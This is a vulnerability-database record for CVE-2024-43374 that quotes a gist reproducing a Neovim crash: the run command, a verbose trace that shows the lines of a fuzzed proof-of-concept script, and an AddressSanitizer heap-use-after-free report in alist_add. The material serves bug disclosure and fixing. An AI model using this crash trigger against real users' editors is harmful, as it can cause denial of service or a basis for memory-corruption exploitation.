{"uuid": "65b3e556-5294-43b2-aa21-13d9a7f7ab04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-43374", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/fac94632a3c276db37727514a35608fd", "content": "Command:\n./nvim-0.10.4 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c qa!\n\n=== OUTPUT ===\nExecuting:     vnoremenu PopUp.Cut                     \"+x\n\nExecuting:     vnoremenu PopUp.Copy                    \"+y\n\nExecuting:     anoremenu PopUp.Paste                   \"+gP\n\nExecuting:     vnoremenu PopUp.Paste                   \"+P\n\nExecuting:     vnoremenu PopUp.Delete                  \"_x\n\nExecuting:     nnoremenu PopUp.Select\\ All             ggVG\n\nExecuting:     vnoremenu PopUp.Select\\ All             gg0oG$\n\nExecuting:     inoremenu PopUp.Select\\ All             VG\n\nExecuting:     anoremenu PopUp.Inspect                 Inspect\n\nExecuting:     anoremenu PopUp.-1-                     \n\nExecuting:     anoremenu PopUp.How-to\\ disable\\ mouse  help disable-mouse\n\nExecuting:   \n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1:  \n\nline 2: an^?|\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc:\nline    2:\nE329: No menu \"^?\"\nline 3: au    BufNew  ile,,3,^S,*,*,.gRowseiq,*,*.^la^?^I:bw\n\nline 4: n^R^R^R^R^R^R^R^R^R^Rightbw\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! 
b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline 5: we^?\n\nline    5:\nE492: Not an editor command: we^?\nline 6: 0sv]<88>N,\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nline    6:\nE444: Cannot close last window\nline 7: \n\nline 8: diffs\n\nline 8: set sbo+=hor\n\nline 9: daru<82>e^Hw/\n\nline    9:\nE492: Not an editor command: daru<82>e^Hw/\nline 10: lv}$}\"\n\n\"\"\"\" [New]\nCannot open file \"\"\"\nline   10:\nE480: No match: $\nline 11: ;$\n\nline 12: dif<99>s@^?]^Pcl{{0^\\db\n\nline   12:\nE488: Trailing characters: <99>s@^?]^Pcl{{0^\\db: dif<99>s@^?]^Pcl{{0^\\db\nline 13: argl{{0}2\n\nExecuting command: \"[[ ${BASH_VERSINFO[0]} -ge 4 ]] && shopt -s globstar; vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob >/tmp/nvim.zzw/oo5n4h/0 {{0}2\"\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nError detected while processing command line..script /home/zzw/Desktop/CVEID2426/CVE-2024-43374/poc[13]..BufNew Autocommands for \"*\":\nE1156: Cannot change the argument list recursively\nExecuting: diffoff!\n\nExecuting: set sbo-=hor\n\nExecuting: unlet! b:keymap_name\n\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! b:keymap_name\n\nExecuting BufNew Autocommands for \"*\"\nautocommand :bw\n\nExecuting: :bw\n\nExecuting: unlet! 
b:keymap_name\n=================================================================\n==107413==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000005b40 at pc 0x00000065f45d bp 0x7ffdd2eb5d30 sp 0x7ffdd2eb5d28\nREAD of size 8 at 0x603000005b40 thread T0\n    #0 0x65f45c in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5\n    #1 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #2 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #3 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #4 0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #18 0x47000d in _start 
(/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x47000d)\n\n0x603000005b40 is located 16 bytes inside of 32-byte region [0x603000005b30,0x603000005b50)\nfreed by thread T0 here:\n    #0 0x4e84cd in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e84cd)\n    #1 0xce9119 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:144:3\n    #2 0x65ede3 in alist_unlink /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:116:5\n    #3 0x12ce2de in win_free /home/zzw/Desktop/neovim/build/../src/nvim/window.c:5207:3\n    #4 0x12c48bb in win_free_mem /home/zzw/Desktop/neovim/build/../src/nvim/window.c:3100:3\n    #5 0x12a0a8c in win_close /home/zzw/Desktop/neovim/build/../src/nvim/window.c:2858:8\n    #6 0x693e43 in do_buffer /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1391:11\n    #7 0x6984f7 in do_bufdel /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:1057:5\n    #8 0x9ea833 in ex_bunload /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:4467:17\n    #9 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #10 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #11 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #12 0x67b3df in apply_autocmds_group /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1830:5\n    #13 0x67ff56 in apply_autocmds /home/zzw/Desktop/neovim/build/../src/nvim/autocmd.c:1498:10\n    #14 0x69802d in buflist_new /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:2009:9\n    #15 0x6a4d75 in buflist_add /home/zzw/Desktop/neovim/build/../src/nvim/buffer.c:3091:16\n    #16 0x65f42d in alist_add /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:222:7\n    #17 0x65f26e in alist_set /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:191:7\n    #18 0x66014a in do_arglist /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:468:7\n    #19 0x662209 in ex_next /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:705:11\n    #20 
0x661405 in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:546:5\n    #21 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #22 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #23 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #24 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #25 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #26 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #27 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #28 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #29 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n\npreviously allocated by thread T0 here:\n    #0 0x4e874d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.10.4+0x4e874d)\n    #1 0xce8ef7 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:98:15\n    #2 0xce90c4 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:132:15\n    #3 0x65ee01 in alist_new /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:123:21\n    #4 0x66136a in ex_args /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:536:7\n    #5 0x9d2f8a in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #6 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #7 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #8 0xfab0ea in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2240:5\n    #9 0xfa76d6 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1796:14\n    #10 0xfa7430 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1804:3\n    #11 0x9d2f8a in execute_cmd0 
/home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1706:7\n    #12 0x9c021d in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2375:7\n    #13 0x9b5ac7 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:665:20\n    #14 0x9b9153 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:374:10\n    #15 0xc0acf9 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1909:5\n    #16 0xbfedf4 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:594:5\n    #17 0x7f99cebb7082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/arglist.c:221:5 in alist_add\n==107413==ABORTING", "creation_timestamp": "2026-06-08T10:57:49.000000Z"}